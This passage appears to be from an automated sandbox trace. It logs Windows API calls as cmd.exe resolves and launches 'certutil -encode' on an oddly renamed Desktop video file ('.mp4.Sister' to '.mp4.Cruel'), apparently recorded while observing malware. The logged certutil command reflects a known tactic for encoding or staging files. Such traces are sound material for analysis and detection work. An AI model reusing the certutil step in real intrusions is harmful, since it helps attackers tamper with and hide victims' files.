(HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95c40) returned 0x106 [0209.908] GetProcessHeap () returned 0x21ed8c70000 [0209.908] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a040 [0209.908] GetProcessHeap () returned 0x21ed8c70000 [0209.908] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a040, Size=0x58) returned 0x21ed937a040 [0209.908] GetProcessHeap () returned 0x21ed8c70000 [0209.908] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a040) returned 0x58 [0209.908] GetProcessHeap () returned 0x21ed8c70000 [0209.909] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a0b0 [0209.909] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0209.909] GetProcessHeap () returned 0x21ed8c70000 [0209.909] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cd60 [0209.909] ??_V@YAXPEAX@Z () returned 0x1 [0209.909] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0209.909] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ce80 [0209.910] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0209.910] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ca60 [0209.910] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0209.910] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa6ca4a32, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa6ca4a32, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cee0 [0209.910] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0209.910] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\2QVQiUvIc2zuhpxx-t.mp4.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c39890, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x4e3ff9f0, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x4e3ff9f0, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x9873, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="2QVQiUvIc2zuhpxx-t.mp4.Sister", cAlternateFileName="2QVQIU~1.SIS")) returned 0x21ed8c7cd00 [0209.910] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0209.911] _wcsnicmp (_String1="2QVQIU~1.SIS", _String2="2QVQiUvIc2zuhpxx-t.mp4.Sister", _MaxCount=0x1d) returned 8 [0209.911] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0209.911] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0209.911] GetProcessHeap () returned 0x21ed8c70000 [0209.911] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7bad0 [0209.911] ??_V@YAXPEAX@Z () returned 0x1 [0209.911] ??_V@YAXPEAX@Z () returned 0x1 [0209.911] GetProcessHeap () returned 0x21ed8c70000 [0209.911] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a0b0, Size=0x250) returned 0x21ed937a0b0 [0209.911] GetProcessHeap () returned 0x21ed8c70000 [0209.911] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a0b0) returned 0x250 [0209.911] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0209.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.911] GetFileType (hFile=0x50) returned 0x2 [0209.911] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0209.911] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0210.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0210.056] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0210.458] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0210.458] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0210.458] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0210.458] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0210.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0210.458] GetFileType (hFile=0x50) returned 0x2 [0210.458] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0210.458] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0210.620] _get_osfhandle (_FileHandle=1) returned 0x50 [0210.620] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0210.766] _get_osfhandle (_FileHandle=1) returned 0x50 [0210.766] GetFileType (hFile=0x50) returned 0x2 [0210.766] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0210.766] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0210.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0210.932] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937a050*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed937a050*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0211.075] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" \"2QVQiUvIc2zuhpxx-t.mp4.Cruel\" ") returned 72 [0211.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.075] GetFileType (hFile=0x50) returned 0x2 [0211.075] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0211.075] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0211.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.256] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x48) returned 1 [0211.404] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0211.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.404] GetFileType (hFile=0x50) returned 0x2 [0211.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0211.404] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0211.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.513] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0211.686] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0211.828] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0211.828] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0211.828] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0211.828] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0211.828] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0211.828] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0211.828] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0211.828] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0211.828] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0211.828] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0211.829] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0211.829] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0211.829] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0211.829] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0211.829] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0211.829] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0211.829] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0211.829] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0211.829] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0211.829] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0211.829] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0211.829] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0211.829] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0211.829] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0211.829] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0211.829] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0211.829] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0211.829] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0211.829] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0211.829] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0211.829] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0211.830] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0211.830] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0211.830] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0211.830] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0211.830] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0211.830] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0211.830] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0211.830] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0211.830] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0211.830] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0211.830] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0211.830] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0211.830] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0211.830] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0211.830] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0211.830] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0211.830] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0211.830] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0211.830] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0211.830] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0211.830] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0211.830] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0211.831] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0211.831] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0211.831] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0211.831] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0211.831] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0211.831] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0211.831] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0211.831] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0211.831] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0211.831] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0211.831] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0211.831] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0211.831] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0211.831] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0211.831] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0211.831] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0211.831] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0211.831] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0211.831] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0211.831] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0211.832] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0211.832] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0211.832] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0211.832] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0211.832] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0211.832] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0211.832] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0211.832] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0211.832] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0211.832] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0211.832] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0211.832] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0211.832] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0211.832] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0211.832] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0211.832] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0211.832] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0211.832] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0211.832] ??_V@YAXPEAX@Z () returned 0x1 [0211.832] GetProcessHeap () returned 0x21ed8c70000 [0211.833] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9390150 [0211.833] GetProcessHeap () returned 0x21ed8c70000 [0211.833] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb2) returned 0x21ed8c96b80 [0211.833] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0211.833] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0211.833] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0211.833] GetProcessHeap () returned 0x21ed8c70000 [0211.833] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8c96f40 [0211.853] SetErrorMode (uMode=0x0) returned 0x0 [0211.853] SetErrorMode (uMode=0x1) returned 0x0 [0211.853] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8c96f50, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0211.853] SetErrorMode (uMode=0x0) returned 0x1 [0211.853] GetProcessHeap () returned 0x21ed8c70000 [0211.853] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c96f40, Size=0x52) returned 0x21ed8c96f40 [0211.854] GetProcessHeap () returned 0x21ed8c70000 [0211.854] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96f40) returned 0x52 [0211.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0211.854] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.854] GetProcessHeap () returned 0x21ed8c70000 [0211.854] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d64dd0 [0211.854] GetProcessHeap () returned 0x21ed8c70000 [0211.854] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d63620 [0211.854] GetProcessHeap () returned 0x21ed8c70000 [0211.854] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63620, Size=0x1be) returned 0x21ed8d63620 [0211.854] GetProcessHeap () returned 0x21ed8c70000 [0211.854] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63620) returned 0x1be [0211.854] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.854] GetProcessHeap () returned 0x21ed8c70000 [0211.854] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c95d50 [0211.854] GetProcessHeap () returned 0x21ed8c70000 [0211.855] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95d50, Size=0x7e) returned 0x21ed8c95d50 [0211.855] GetProcessHeap () returned 0x21ed8c70000 [0211.855] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95d50) returned 0x7e [0211.855] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.855] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0211.855] GetLastError () returned 0x2 [0211.856] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.856] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0211.856] GetLastError () returned 0x2 [0211.856] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.857] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0211.857] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0211.857] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0211.857] GetLastError () returned 0x2 [0211.857] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd00 [0211.858] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0211.858] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0211.858] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0211.858] ??_V@YAXPEAX@Z () returned 0x1 [0211.858] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0212.125] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0212.125] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0212.125] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0212.125] GetProcessHeap () returned 0x21ed8c70000 [0212.125] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e60 [0212.125] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0212.127] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0212.128] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0212.128] GetProcessHeap () returned 0x21ed8c70000 [0212.128] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e60) returned 1 [0212.128] GetProcessHeap () returned 0x21ed8c70000 [0212.128] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95720 [0212.128] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.128] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0212.322] _get_osfhandle (_FileHandle=0) returned 0x4c [0212.322] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0212.470] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" 